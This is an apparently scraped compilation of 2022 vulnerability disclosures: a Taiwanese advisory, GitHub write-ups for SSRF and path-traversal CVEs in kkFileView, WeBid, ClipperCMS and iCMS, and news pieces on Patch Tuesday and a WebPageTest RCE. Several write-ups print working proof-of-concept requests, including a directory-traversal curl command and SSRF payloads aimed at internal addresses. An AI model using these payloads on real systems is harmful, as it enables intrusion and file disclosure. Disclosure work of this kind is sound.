RAVA certificate validation system has inadequate filtering for URL parameter. An unauthenticated remote attacker can perform SSRF attack to discover internal network topology base on query response.

:::

*   首頁
*   資安服務
*   台灣漏洞揭露平台 (TVN)
*   TVN (Taiwan Vulnerability Note) 漏洞公告

TVN ID

TVN-202209011

CVE ID

CVE-2022-39055

CVSS

5.3 (Medium)  
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

影響產品

全景軟體 RAVA憑證驗證系統網站 v3

問題描述

RAVA憑證驗證系統網站特定URL參數未作恰當的過濾，遠端攻擊者不須權限，即可進行SSRF攻擊，透過回傳的錯誤訊息判斷目標網址狀態，藉以探測內網狀態。

解決方法

請與全景軟體聯繫提供修補方案

漏洞通報者

Jay Wu吳瑋杰 (Acer Cyber Security Inc., ACSI)

公開日期

2022-10-18

CVE-2022-39055: 全景軟體 RAVA憑證驗證系統網站 - Server-Side Request Forgery (SSRF)

kkFileView 4.0 is vulnerable to Server-side request forgery (SSRF) via controller\OnlinePreviewController.java.

Permalink

Cannot retrieve contributors at this time

**KkFileView has SSRF vulnerabilities**

The server provides the function of obtaining data from other server applications without filtering or restricting addresses and protocols.

Set up the test environment as shown below

Set up kkFileView service on Server1 server and start HTTP service on port 90 of Server2 host

Server2 host Settings do not allow direct access from PC1 hosts

By accessing server1 http://ip:prot/onlinPreview?url=

The Intranet request address to be probed is base64 encoded and used as the URL parameter value for this request

**Related Request packets**

    GET /onlinePreview?url=aHR0cDovLzE5Mi4xNjguMTcuMTUzOjkwL2luZGV4Lmh0bWw= HTTP/1.1
    Host: 192.168.17.128:8012
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
    Accept-Encoding: gzip, deflate
    DNT: 1
    Connection: close
    Upgrade-Insecure-Requests: 1
    

The contents of the Server2 host can be detected in the response package

You can also see Server1 requesting it in Server2's Web services log

120/5000 Check the server\src\main\java\cn\keking\web\controller\OnlinePreviewController.java OnlinePreview function in Java Here is not to the incoming base64 content filtering operation

CVE-2022-42149: paper/ssrf_vul_en.md at main · xiaojiangxl/paper

Chamilo 1.11.16 is affected by an authenticated local file inclusion vulnerability which allows authenticated users with access to 'big file uploads' to copy/move files from anywhere in the file system into the web directory.

CVE-2022-42029: Security issues - Chamilo LMS

A security issue was discovered in WeBid <=1.2.2. A Server-Side Request Forgery (SSRF) vulnerability in the admin/theme.php file allows remote attackers to inject payloads via theme parameters to read files across directories.

**A Path Traversal vulnerability in file_get_contents Function of /admin/theme.php File (WeBid 1.2.2 version)****0x01 Affected version**

vendor: https://github.com/renlok/WeBid

version: <=1.2.2

php version: 7.x

**0x02 Vulnerability description**

A Path Traversal (CWE-22) in admin/theme.php file of WeBid allows remote attackers to uses external input from the theme parameter to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory. This allows you to read any file from any location on the operating system.

if (isset($\_POST\['file'\]) && !empty($\_POST\['theme'\]))
{
	$theme\_path = $theme\_root . '/' . $\_POST\['theme'\];
	if ($\_POST\['theme'\] != 'CVS' && is\_dir($theme\_path) && substr($\_POST\['theme'\], 0, 1) != '.')
	{
		$edit\_file = true;
		$filename = $\_POST\['file'\];
		$theme = $\_POST\['theme'\];
		$filecontents = htmlentities(file\_get\_contents($theme\_path . '/' . $filename));
	}
}

The vulnerable code snippet is shown above. Because the theme parameter is unrestricted, it is also possible to use the server side to get the file information of the corresponding directory, including the file content. The corresponding PoC is as follows:

    POST /WeBid-1.2.1/admin/theme.php HTTP/1.1
    Host: 172.16.119.146
    Content-Length: 75
    Content-Type: application/x-www-form-urlencoded
    Cookie: PHPSESSID=0me7tniqbqltu0jo622cl9jqe6
    Connection: close
    
    file=flag&theme=/../../../../../&csrftoken=f514194228c4c8561ccc9542abcf0289
    

You can also use the following curl command to verify the vulnerability

    curl -i -s -k -X $'POST' \
        -H $'Host: 172.16.119.146' -H $'Content-Length: 75' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Connection: close' \
        -b $'PHPSESSID=0me7tniqbqltu0jo622cl9jqe6' \
        --data-binary $'file=flag&theme=/../../../../../&csrftoken=f514194228c4c8561ccc9542abcf0289' \
        $'http://172.16.119.146/WeBid-1.2.1/admin/theme.php'
    

**0x03 Acknowledgement**

z3

CVE-2022-41477: CVE_Request/WeBid_Path_Traversal.md at master · zer0yu/CVE_Request

The ManageJiraConnectors API in Atlassian Jira Align before version 10.109.2 allows remote attackers to exploit this issue to access internal network resources via a Server-Side Request Forgery. This can be exploited by a remote, unauthenticated attacker with Super Admin privileges by sending a specially crafted HTTP request.

CVE-2022-36802

ClipperCMS 1.3.3 was discovered to contain a Server-Side Request Forgery (SSRF) via the pkg_url parameter at /manager/index.php.

**PoC**

There is a SSRF vulnerability in the pkg\_url parameter of the index.php?a=120 interface in ClipperCMS-clipper\_1.3.3

    manager\actions\package_manager.php
    
    if ((@$_GET['repo'] || $_GET['repo'] === '0') && ctype_digit($_GET['repo']) && $_GET['repo'] < sizeof($repos)) {
    
        $mode = 'repo-list';
        $repo_tag = (isset($_GET['tag']) && ctype_alpha($_GET['tag'])) ? $_GET['tag'] : null;
        $PM_cache_idx = $repo_tag ? $repo_tag : 0;
    
    } elseif ($_SERVER['REQUEST_METHOD'] == 'POST') {
    
        if (@$_POST['pkg_url']) {
    
            $PM = new PackageManager($modx, $_POST['pkg_url']);
            $mode = 'summarise';
    
        } elseif (@$_POST['pkg_folder']) {
    
            $PM = new PackageManager($modx, $_POST['pkg_folder']);
            $mode = 'summarise';
    
        } elseif (isset($_FILES['pkg_file']) && $_FILES['pkg_file']['error'] != UPLOAD_ERR_NO_FILE) {
    
            switch($_FILES['pkg_file']['error']) {
                case UPLOAD_ERR_OK:
                
                    if (is_uploaded_file($_FILES['pkg_file']['tmp_name'])) {
                        $PM = new PackageManager($modx, $_FILES['pkg_file']['tmp_name'], $_FILES['pkg_file']['name']);
                        $mode = 'summarise';
                    } else {
                        $errmsg = $_lang['package_manager_error_internal'];
                    }
                    
                    break;
    
                case UPLOAD_ERR_INI_SIZE:
                    $errmsg = $_lang['package_manager_error_filesize'];
                    break;
    
                default:
                    $errmsg = $_lang['package_manager_error_internal'];
                    break;
        
            }
            ...
    
    

**http://xxxx/manager/index.php?a=120**

    
    POST /manager/index.php?a=120 HTTP/1.1
    Host: 192.168.156.136
    Content-Length: 602
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.156.136
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEJOp0kky1hQLWB2A
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.156.136/manager/index.php?a=120&repo=0
    Accept-Encoding: gzip, deflate
    Accept-Language: zh,zh-CN;q=0.9
    Cookie: iCMS_ADMIN_AUTH=51bf76419l_i3_t-1_yZJVXGwCgSQ1XfO4exCxVvHn4s8hU09WAjnkVsBo-0gp1LoJu3_X3RBjw9g_ZEpv5avtlt4MCgPGuzQYz31RXZtB9wWh-Yh5JB6CnhL2HOsg; my_wikiUserID=3; my_wikiUserName=123; 4c707ae227f79bf7de196947377b3e3d=da02mk81p3acuoocm7sp7jk4u2; PHPSESSID=rfkgmjgnf85n1qcc1ii3rsqag6; SN6310b3eaca4dc=ru28c1conkikqpb0k7ualk29u5
    Connection: close
    
    ------WebKitFormBoundaryEJOp0kky1hQLWB2A
    Content-Disposition: form-data; name="pkg_url"
    
    http://192.168.156.136:88/111
    ------WebKitFormBoundaryEJOp0kky1hQLWB2A
    Content-Disposition: form-data; name="pkg_file"; filename=""
    Content-Type: application/octet-stream
    
    
    ------WebKitFormBoundaryEJOp0kky1hQLWB2A
    Content-Disposition: form-data; name="pkg_folder"
    
    
    ------WebKitFormBoundaryEJOp0kky1hQLWB2A
    Content-Disposition: form-data; name="verbose"
    
    0
    ------WebKitFormBoundaryEJOp0kky1hQLWB2A
    Content-Disposition: form-data; name="go"
    
    Upload
    ------WebKitFormBoundaryEJOp0kky1hQLWB2A--
    
    

**Acknowledgement**

Thanks to the partners who discovered the vulnerability together：

Yi-fei Gao en-ze wang lin-jie wu

CVE-2022-41497: insight/ClipperCMS SSRF.md at master · jayus0821/insight

iCMS v7.0.16 was discovered to contain a Server-Side Request Forgery (SSRF) via the url parameter at admincp.php.

There is a SSRF vulnerability in the url parameter of the admincp.php interface in iCMS-v7.0.16

    app\spider\spider_tools.class.php
    
    public static function remote($url,$ref=null,$_count = 0) {
            if(self::safe_url($url)===false) return false;
    
            (iPHP_SHELL && self::$debug) && print self::datetime()."\033[36mspider_tools::remote\033[0m [".($_count+1)."] => ".$url.PHP_EOL;
    
            $parsed = parse_url($url);
            $url = str_replace('&amp;', '&', $url);
            if(empty(spider::$referer)){
                spider::$referer = $parsed['scheme'] . '://' . $parsed['host'];
            }
    
            $options = array(
                CURLOPT_URL                  => $url,
                CURLOPT_REFERER              => self::$CURLOPT_REFERER?self::$CURLOPT_REFERER:spider::$referer,
                CURLOPT_USERAGENT            => self::$CURLOPT_USERAGENT?self::$CURLOPT_USERAGENT:spider::$useragent,
                CURLOPT_ENCODING             => self::$CURLOPT_ENCODING?self::$CURLOPT_ENCODING:spider::$encoding,
                CURLOPT_TIMEOUT              => self::$CURLOPT_TIMEOUT,
                CURLOPT_CONNECTTIMEOUT       => self::$CURLOPT_CONNECTTIMEOUT,
                CURLOPT_RETURNTRANSFER       => 1,
                CURLOPT_FAILONERROR          => 0,
                CURLOPT_HEADER               => 0,
                CURLOPT_NOSIGNAL             => true,
                // CURLOPT_DNS_USE_GLOBAL_CACHE => true,
                // CURLOPT_DNS_CACHE_TIMEOUT    => 86400,
                CURLOPT_SSL_VERIFYPEER       => false,
                CURLOPT_SSL_VERIFYHOST       => false
                // CURLOPT_FOLLOWLOCATION => 1,// 使用自动跳转
                // CURLOPT_MAXREDIRS => 7,//查找次数，防止查找太深
            );
            ...
    

    GET c HTTP/1.1
    Host: 192.168.156.136:88
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: zh,zh-CN;q=0.9
    Cookie: iCMS_ADMIN_AUTH=b5e13749p_MURGBi7YR3-HetWrkTTKq1pTW78-1apE9T74fye8D9Ticl-PqpZ5raVcOeex3BRI6jYetvGYFegWP00Gv1a4Q2a_RIxQi81T1HtLgYm00OzJzHEb-pVQ
    Connection: close

CVE-2022-41496: insight/iCMS SSRF.md at master · jayus0821/insight

ClipperCMS 1.3.3 was discovered to contain a Server-Side Request Forgery (SSRF) via the rss_url_news parameter at /manager/index.php.

There is a SSRF vulnerability in the rss\_url\_news parameter of the index.php?a=30 interface in ClipperCMS-clipper\_1.3.3

    POST /manager/index.php?a=30 HTTP/1.1
    Host: 192.168.156.136
    Content-Length: 6669
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://192.168.156.136
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://192.168.156.136/manager/index.php?a=17
    Accept-Encoding: gzip, deflate
    Accept-Language: zh,zh-CN;q=0.9
    Cookie: iCMS_ADMIN_AUTH=51bf76419l_i3_t-1_yZJVXGwCgSQ1XfO4exCxVvHn4s8hU09WAjnkVsBo-0gp1LoJu3_X3RBjw9g_ZEpv5avtlt4MCgPGuzQYz31RXZtB9wWh-Yh5JB6CnhL2HOsg; my_wikiUserID=3; my_wikiUserName=123; 4c707ae227f79bf7de196947377b3e3d=da02mk81p3acuoocm7sp7jk4u2; PHPSESSID=rfkgmjgnf85n1qcc1ii3rsqag6; SN6310b3eaca4dc=ru28c1conkikqpb0k7ualk29u5; KCFINDER_showname=on; KCFINDER_showsize=off; KCFINDER_showtime=off; KCFINDER_order=name; KCFINDER_orderDesc=off; KCFINDER_view=thumbs; KCFINDER_displaySettings=off
    Connection: close
    
    site_id=6310b3eb4111b&settings_version=1.3.3&site_name=My+Clipper+Site&valid_hostnames=&modx_charset=UTF-8&xhtml_urls=1&site_start=1&error_page=1&unauthorized_page=1&site_status=1&site_unavailable_page=&reload_site_unavailable=&site_unavailable_message=The+site+is+currently+unavailable&siteunavailable_message_default=The+site+is+currently+unavailable.&track_visitors=0&auto_template_logic=parent&template_rules_tv=&default_template=3&old_template=3&publish_default=0&cache_default=1&search_default=1&auto_menuindex=1&txt_custom_contenttype=&custom_contenttype=application%2Frss%2Bxml%2Capplication%2Fpdf%2Capplication%2Fvnd.ms-word%2Capplication%2Fvnd.ms-excel%2Ctext%2Fhtml%2Ctext%2Fcss%2Ctext%2Fxml%2Ctext%2Fjavascript%2Ctext%2Fplain&server_offset_time=0&server_protocol=http&rss_len=10&error_handling_deprecated=1&error_handling_silent=0&jquery_url=assets%2Fjs%2Fjquery.min.js&jquery_plugin_dir=assets%2Fjs%2F&jquery_noconflict=1&friendly_urls=0&friendly_url_prefix=&friendly_url_suffix=.html&friendly_alias_urls=1&use_alias_path=0&allow_duplicate_alias=0&automatic_alias=1&use_udperms=1&udperms_allowroot=0&failed_login_attempts=3&webuser_hash_method=1&blocked_minutes=60&reload_captcha_words=&captcha_words=Clipper%2CAccess%2CBetter%2CBitCode%2CCache%2CDesc%2CDesign%2CExcell%2CEnjoy%2CURLs%2CTechView%2CGerald%2CGriff%2CHumphrey%2CHoliday%2CIntel%2CIntegration%2CJoystick%2CJoin%28%29%2CTattoo%2CGenetic%2CLight%2CLikeness%2CMarit%2CMaaike%2CNiche%2CNetherlands%2COrdinance%2COscillo%2CParser%2CPhusion%2CQuery%2CQuestion%2CRegalia%2CRighteous%2CSnippet%2CSentinel%2CTemplate%2CThespian%2CUnity%2CEnterprise%2CVerily%2CVeri%2CWebsite%2CWideWeb%2CYap%2CYellow%2CZebra%2CZygote&captcha_words_default=ClipperCMS%2CAccess%2CBetter%2CBitCode%2CChunk%2CCache%2CDesc%2CDesign%2CExcell%2CEnjoy%2CURLs%2CTechView%2CGerald%2CGriff%2CHumphrey%2CHoliday%2CIntel%2CIntegration%2CJoystick%2CJoin%28%29%2COscope%2CGenetic%2CLight%2CLikeness%2CMarit%2CMaaike%2CNiche%2CNetherlands%2COrdinance%2COscillo%2CParser%2CPhusion%2CQuery%2CQuestion%2CRegalia%2CRighteous%2CSnippet%2CSentinel%2CTemplate%2CThespian%2CUnity%2CEnterprise%2CVerily%2CTattoo%2CVeri%2CWebsite%2CWideWeb%2CYap%2CYellow%2CZebra%2CZygote&emailsender=1%401.com&smtp=0&smtp_host=&smtp_port=&smtp_prefix=ssl&smtp_user=&smtp_pass=&reload_emailsubject=&emailsubject=Your+login+details&emailsubject_default=Your+login+details&reload_signupemail_message=&signupemail_message=Hello+%5B%2Buid%2B%5D+%0D%0A%0D%0AHere+are+your+login+details+for+%5B%2Bsname%2B%5D+Content+Manager%3A%0D%0A%0D%0AUsername%3A+%5B%2Buid%2B%5D%0D%0APassword%3A+%5B%2Bpwd%2B%5D%0D%0A%0D%0AOnce+you+log+into+the+Content+Manager+%28%5B%2Bsurl%2B%5D%29%2C+you+can+change+your+password.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&system_email_signup_default=Hello+%5B%2Buid%2B%5D+%0D%0A%0D%0AHere+are+your+login+details+for+%5B%2Bsname%2B%5D+Content+Manager%3A%0D%0A%0D%0AUsername%3A+%5B%2Buid%2B%5D%0D%0APassword%3A+%5B%2Bpwd%2B%5D%0D%0A%0D%0AOnce+you+log+into+the+Content+Manager+%28%5B%2Bsurl%2B%5D%29%2C+you+can+change+your+password.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&reload_websignupemail_message=&websignupemail_message=Hello+%5B%2Buid%2B%5D%0D%0A%0D%0AHere+are+your+login+details+for+%5B%2Bsname%2B%5D%3A%0D%0A%0D%0AUsername%3A+%5B%2Buid%2B%5D%0D%0APassword%3A+%5B%2Bpwd%2B%5D%0D%0A%0D%0AOnce+you+log+into+%5B%2Bsname%2B%5D+%28%5B%2Bsurl%2B%5D%29%2C+you+can+change+your+password.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&system_email_websignup_default=Hello+%5B%2Buid%2B%5D%0D%0A%0D%0AHere+are+your+login+details+for+%5B%2Bsname%2B%5D%3A%0D%0A%0D%0AUsername%3A+%5B%2Buid%2B%5D%0D%0APassword%3A+%5B%2Bpwd%2B%5D%0D%0A%0D%0AOnce+you+log+into+%5B%2Bsname%2B%5D+%28%5B%2Bsurl%2B%5D%29%2C+you+can+change+your+password.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&reload_system_email_webreminder_message=&webpwdreminder_message=Hello+%5B%2Buid%2B%5D%0D%0A%0D%0ATo+activate+your+new+password+click+the+following+link%3A%0D%0A%0D%0A%5B%2Bsurl%2B%5D%0D%0A%0D%0AIf+successful+you+can+use+the+following+password+to+login%3A%0D%0A%0D%0APassword%3A%5B%2Bpwd%2B%5D%0D%0A%0D%0AIf+you+did+not+request+this+email+then+please+ignore+it.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&system_email_webreminder_default=Hello+%5B%2Buid%2B%5D%0D%0A%0D%0ATo+activate+your+new+password+click+the+following+link%3A%0D%0A%0D%0A%5B%2Bsurl%2B%5D%0D%0A%0D%0AIf+successful+you+can+use+the+following+password+to+login%3A%0D%0A%0D%0APassword%3A%5B%2Bpwd%2B%5D%0D%0A%0D%0AIf+you+did+not+request+this+email+then+please+ignore+it.%0D%0A%0D%0ARegards%2C%0D%0ASite+Administrator&manager_language=english&manager_theme=ClipperModern&warning_visibility=1&docid_visibility=1&tree_page_click=27&remember_last_tab=1&tree_show_protected=0&rss_url_news=http%3A%2F%2F192.168.156.136%3A88%2F123&rss_url_security=http%3A%2F%2F192.168.156.136%3A88%2F123123123&datepicker_year_range=-10&date_format=dd-mm-yy&time_format=HH%3Amm%3Ass&number_of_logs=100&number_of_results=20&validate_referer=1&strip_image_paths=1&use_browser=1&rb_webuser=0&rb_base_dir=A%3A%2Frecent%2Fwez_paper%2Fcms%2FClipperCMS-clipper_1.3.3%2FClipperCMS-clipper_1.3.3%2Fassets%2F&rb_base_url=assets%2F&file_browser=kcfinder&upload_images=bmp%2Cico%2Cgif%2Cjpeg%2Cjpg%2Cpng%2Cpsd%2Ctif%2Ctiff&upload_media=au%2Cavi%2Cmp3%2Cmp4%2Cmpeg%2Cmpg%2Cwav%2Cwmv&upload_flash=fla%2Cflv%2Cswf&clean_uploaded_filename=0&use_editor=1&which_editor=TinyMCE&fe_editor_lang=english&editor_css_path=&tinymce_editor_theme=editor&tinymce_custom_plugins=style%2Cadvimage%2Cadvlink%2Csearchreplace%2Cprint%2Ccontextmenu%2Cpaste%2Cfullscreen%2Cnonbreaking%2Cxhtmlxtras%2Cvisualchars%2Cmedia&tinymce_custom_buttons1=undo%2Credo%2Cselectall%2Cseparator%2Cpastetext%2Cpasteword%2Cseparator%2Csearch%2Creplace%2Cseparator%2Cnonbreaking%2Chr%2Ccharmap%2Cseparator%2Cimage%2Clink%2Cunlink%2Canchor%2Cmedia%2Cseparator%2Ccleanup%2Cremoveformat%2Cseparator%2Cfullscreen%2Cprint%2Ccode%2Chelp&tinymce_custom_buttons2=bold%2Citalic%2Cunderline%2Cstrikethrough%2Csub%2Csup%2Cseparator%2Cbullist%2Cnumlist%2Coutdent%2Cindent%2Cseparator%2Cjustifyleft%2Cjustifycenter%2Cjustifyright%2Cjustifyfull%2Cseparator%2Cstyleselect%2Cformatselect%2Cseparator%2Cstyleprops&tinymce_custom_buttons3=&tinymce_custom_buttons4=&tinymce_css_selectors=&filemanager_path=A%3A%2Frecent%2Fwez_paper%2Fcms%2FClipperCMS-clipper_1.3.3%2FClipperCMS-clipper_1.3.3%2F&upload_files=aac%2Cau%2Cavi%2Ccss%2Ccache%2Cdoc%2Cdocx%2Cgz%2Cgzip%2Chtaccess%2Chtm%2Chtml%2Cjs%2Cmp3%2Cmp4%2Cmpeg%2Cmpg%2Cods%2Codp%2Codt%2Cpdf%2Cppt%2Cpptx%2Crar%2Ctar%2Ctgz%2Ctxt%2Cwav%2Cwmv%2Cxls%2Cxlsx%2Cxml%2Cz%2Czip&upload_maxsize=1048576&new_file_permissions=0644&new_folder_permissions=0755

CVE-2022-41495: insight/ClipperCMS SSRF2.md at master · jayus0821/insight

Categories: Exploits and vulnerabilities
Categories: News
Tags: Microsoft

Tags:  Apple

Tags:  Google

Tags:  Android

Tags:  Samsung

Tags:  Xiaomi

Tags:  Adobe

Tags:  SAP

Tags:  VMWare

Tags:  Fortinet

Tags:  CVE-2022-41033

Tags:  CVE-2022-41040

Tags:  zero-day

No fix for ProxyNotShell



(Read more...)




The post Update now! October patch Tuesday fixes actively used zero-day...but not the one you expected appeared first on Malwarebytes Labs.

Microsoft fixed 84 vulnerabilities in its October 2022 Patch Tuesday updates. Thirteen of them received the classification 'Critical'. Among them are a zero-day vulnerability that's being actively exploited, and another that hasn’t been spotted in the wild yet.

The bad news is that the much-desired fix for the "ProxyNotShell" Exchange vulnerabilities was not included.

**What was fixed**

A widely accepted definition for a zero-day is a computer-software vulnerability previously unknown to those who should be interested in its mitigation, such as the software vendor. Until the vulnerability is mitigated, hackers can exploit it to adversely affect programs, data, computers or a network.

As such, a publicly known vulnerability is called a zero-day even if there is no known actively used exploitation for it.

The actively exploited vulnerability in this month's batch is CVE-2022-41033, a vulnerability with a CVSS score of 7.8 out of 10. This is described as a 'Windows COM+ Event System Service Elevation of Privileges (EoP)’ vulnerability, which gives an attacker the potential to obtain SYSTEM privileges after successful exploitation.

This type of vulnerability usually comes into play once an attacker has gained an initial foothold on a system. They can then use this vulnerability to gain more permissions and expand their access to the compromised system.

Another publicly disclosed vulnerability that gets a fix is CVE-2022-41043, a Microsoft Office Information Disclosure vulnerability. Affected products are Microsoft Office LTSC for Mac 2021 and Microsoft Office 2019 for Mac. Microsoft says attackers could use this vulnerability to gain access to users' authentication tokens.

**What wasn’t fixed**

The Exchange Server "ProxyNotShell" vulnerabilities, CVE-2022-41040 and CVE-2022-41082, were not fixed in this round of updates. One is a Server-Side Request Forgery (SSRF) vulnerability and the other a remote code execution (RCE) vulnerability that exists when PowerShell is accessible to the attacker. The two can be chained together into an attack.

Microsoft says it will release updates for these vulnerabilities when they are ready. In the meantime, you should read this blog post to learn about mitigations for those vulnerabilities.

**Other vendors**

Other vendors have synchronized their periodic updates with Microsoft. Here are few major ones:

*   Adobe released security updates to fix 29 vulnerabilities in several products.
*   Apple published iOS 16.0.3.
*   Fortinet released important security updates.
*   Google patched several vulnerabilities for Android.
*   Samsung has started rolling out October 2022 security updates for some of its devices.
*   SAP has released updates for several of its products.
*   VMware published security advisory VMSA-2022-0025.
*   Xiaomi released the October 2022 Security Patch Update tracker.

That should be enough to keep you busy, et patching!

Update now! October patch Tuesday fixes actively used zero-day...but not the one you expected

Public disclosure, a talk, and a blog post later, the RCE exploit remains unresolved

Public disclosure, a talk, and a blog post later, the RCE exploit remains unresolved

Despite a researcher’s best efforts at disclosure, the maintainers of the WebPageTest project appear to be ignoring a severe remote code execution (RCE) vulnerability.

In a blog post dated September 23, ManoMano researcher Louka “Laluka” Jacques-Chevallier discussed his discovery of a pre-authentication RCE vulnerability in the open source project WebPageTest.

The research has also been the subject of a talk at DEFCON Paris.

Catch up with the latest security research and analysis

Developed by Catchpoint, WebPageTest is a tool dating back to the days of dial-up modems and the 1990s, which has evolved to become a utility to check the speed and performance of website code for optimization purposes.

According to the researcher, this software has been “prone” to security issues in the past, including a lack of updates to code and containers, outdated components which remained unpatched against known vulnerabilities, and the “intensive use of smelly PHP code”.

The latest stable release of WebPageTest, v22.01, was published in October 2021.

Server-side request forgery (SSRF) vulnerabilities, bugs that allow attackers to make successful requests via a server-side application to an unintended location or resource, have been found in WebPageTest in the past.

A newly discovered SSRF flaw was the focus of Laluka’s research.

After examining the software’s source code and carrying out both crawling and fuzzing tests, Laluka discovered an SSRF vulnerability in under 15 minutes. The SSRF was limited to an HTTP scheme, but the underlying code held more surprises for the cybersecurity researcher.

**Under the microscope**

Upon closer inspection Laluka uncovered a range of issues, including PHP code that could trigger a payload by including a slash in a path, file write bugs, and sanitization failures. Eventually, the researcher was able to push a command injection, create a reverse shell, exploit JSON file jobs, and achieve RCE.

It may also be possible to exploit the RCE if the Beanstalkd work queue engine is in use. While not present in default configurations, Laluka says that the SSRF and command injection issues could be exploited to inject a new, malicious job and force the worker to use the file.

The researcher found the first SSRF bug on April 15, and by May 25, verified the full RCE exploit chain. Laluka contacted the vendor on June 15, and although Catchpoint responded, the lines of communication were described as “pretty tedious”.

**‘Open bag’**

Despite providing the technical details of the issue and a video Proof-of-Concept (PoC), the vendor did not respond until July 28, when Catchpoint offered a $300 “big” bounty program reward.

Laluka offered to help with patch validation, but there has been radio silence since. Although he was paid, it’s been over 90 days, and there is still no news on a fix.

“I think that this software can be really helpful for devs and site reliability engineers, but that the codebase isn’t following good practices whatsoever,” Laluka told The Daily Swig. “It’s basically features in a bag – an open bag.”

Catchpoint has not responded to requests for comment from The Daily Swig.

RELATED PHP package manager component Packagist vulnerable to compromise

Tag

#ssrf